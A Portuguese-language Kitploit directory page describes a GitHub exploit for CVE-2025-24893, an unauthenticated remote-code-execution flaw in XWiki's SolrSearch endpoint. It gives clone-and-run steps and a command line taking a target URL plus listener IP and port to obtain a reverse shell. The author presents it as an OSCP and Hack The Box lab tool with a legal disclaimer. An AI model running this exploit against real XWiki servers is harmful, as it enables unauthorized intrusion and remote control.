Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24893 — Exploit estilo OSCP do CVE-2025-24893 para Linux XWiki | Kitploit
Ferramentas/GitHubGitHub/vasilysaint/cve-2025-24893
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoLabs e Prática
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

Exploit estilo OSCP do CVE-2025-24893 para Linux XWiki

Ver Repositório
12há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24893

XWiki Platform é uma plataforma wiki genérica que fornece serviços de runtime para aplicações construídas sobre ela. Devido a uma vulnerabilidade no endpoint SolrSearch, um usuário não autenticado pode obter execução remota arbitrária de código. Esta vulnerabilidade afeta a confidencialidade, a integridade e a disponibilidade de toda a instalação do XWiki.

CVE: CVE-2025-24893


Demonstração

Uma demonstração do exploit é mostrada abaixo:

Demonstração no Terminal

Uso

Para usar este exploit, siga estes passos:

  1. Clone o repositório: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. Navegue até o diretório clonado: cd CVE-2025-24893
  3. Instale as dependências necessárias: pip install requests
  4. Execute o exploit:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Baixar ferramenta

Sobre Este Exploit

Este exploit demonstra a vulnerabilidade de execução remota de código descrita em CVE-2025-24893 e permite que um usuário não autenticado obtenha um reverse shell em instalações XWiki baseadas em Linux vulneráveis.

Eu desenvolvi originalmente esta ferramenta para uso em ambientes de treinamento, como laboratórios de preparação para OSCP e Hack The Box, onde eu queria uma maneira simples e confiável de reproduzir a vulnerabilidade. Como nenhuma ferramenta existente atendia aos meus requisitos, decidi criar uma.

Embora o CVE-2025-24893 já tenha sido corrigido há muito tempo nas versões suportadas do XWiki, este exploit deve ser usado apenas contra sistemas que você possui ou para os quais possui autorização explícita para testar.

O autor não assume nenhuma responsabilidade por qualquer uso indevido deste software ou por qualquer dano resultante do seu uso.

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e a avaliações de segurança autorizadas.

Use-a apenas contra sistemas que você possui ou para os quais possui autorização explícita para testar. O autor não assume nenhuma responsabilidade por qualquer uso indevido deste software ou por quaisquer danos resultantes do seu uso.

Contribuindo

Contribuições são bem-vindas.

Se você encontrar bugs, tiver sugestões de melhorias ou quiser adicionar suporte a payloads, plataformas ou recursos adicionais, sinta-se à vontade para abrir uma issue ou enviar um pull request.

Feedback construtivo, relatórios de testes e contribuições de código são muito apreciados.